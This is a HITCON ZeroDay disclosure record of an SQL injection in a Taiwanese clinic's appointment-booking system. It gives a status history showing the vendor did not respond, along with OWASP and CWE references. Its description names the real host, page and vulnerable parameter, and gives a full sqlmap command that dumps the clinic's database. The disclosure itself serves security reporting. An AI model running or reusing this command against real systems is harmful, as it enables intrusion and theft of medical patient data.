Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2016-00016
- Vendor: 秉坤婦幼診所
- Title: 秉坤婦幼診所掛號系統資料庫注入
- Introduction: SQL注入
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2016/01/14 13:39:53 : 新提交 (由 SHIH, FAN-SYUN 更新此狀態)
- 2016/02/01 03:14:15 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/02/01 03:15:43 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/04/15 18:03:04 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)
詳細資料
- ZDID:ZD-2016-00016
- 通報者:jpeanut (SHIH, FAN-SYUN)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
敘述
問題網址:http://114.32.193.114/WEB/Appointment/frmAppointment_doctor.aspx
問題參數 ctl00%24MainContent%24txt%E9%86%AB%E5%B8%AB%E5%A7%93%E5%90%8D
sqlmap dump DB 指令
sqlmap -u http://114.32.193.114/WEB/Appointment/frmAppointment_doctor.aspx --data "VIEWSTATE=%2FwEPDwUKMjA1NDIwNjg0MA9kFgJmD2QWAgIDD2QWBgIGDw8WAh4HVmlzaWJsZWhkZAIIDw8WAh8AaGRkAgkPZBYGAgMPZBYCAgcPPCsAEQEBEBYAFgAWAGQCBQ9kFgICAQ8PFgIeBFRleHRlZGQCBw8WAh8AaBYCAgMPPCsAEQEBEBYAFgAWAGQYAgUpY3RsMDAkTWFpbkNvbnRlbnQkZ3bpoJDntITnj63oqLrliKXmn6XoqaIPZ2QFJmN0bDAwJE1haW5Db250ZW50JGd26aCQ57SE6Yar5bir5p%2Bl6KmiD2dkFFOspHktiiL0SXzFoOqIInqxUINTBiEUDpqeNJSBL%2Bw%3D&EVENTVALIDATION=%2FwEWCgK%2F6LTJCgLl97ftDQLk97ftDQLj97ftDQLq97ftDQLp97ftDQLo97ftDQLd97ftDQK%2FvtHJCAKU%2F%2F6FDTVJ1HBJZPZiV8NNRDFrTshNalQOLBZPiZJdZJ%2F1qUxA&ctl00%24MainContent%24txt%E9%86%AB%E5%B8%AB%E5%A7%93%E5%90%8D=test&ctl00%24MainContent%24btn%E6%9F%A5%E8%A9%A2%E9%86%AB%E5%B8%AB=%E6%9F%A5%E8%A9%A2" -p "ctl00%24MainContent%24txt%E9%86%AB%E5%B8%AB%E5%A7%93%E5%90%8D" --technique=U -D tgk --dump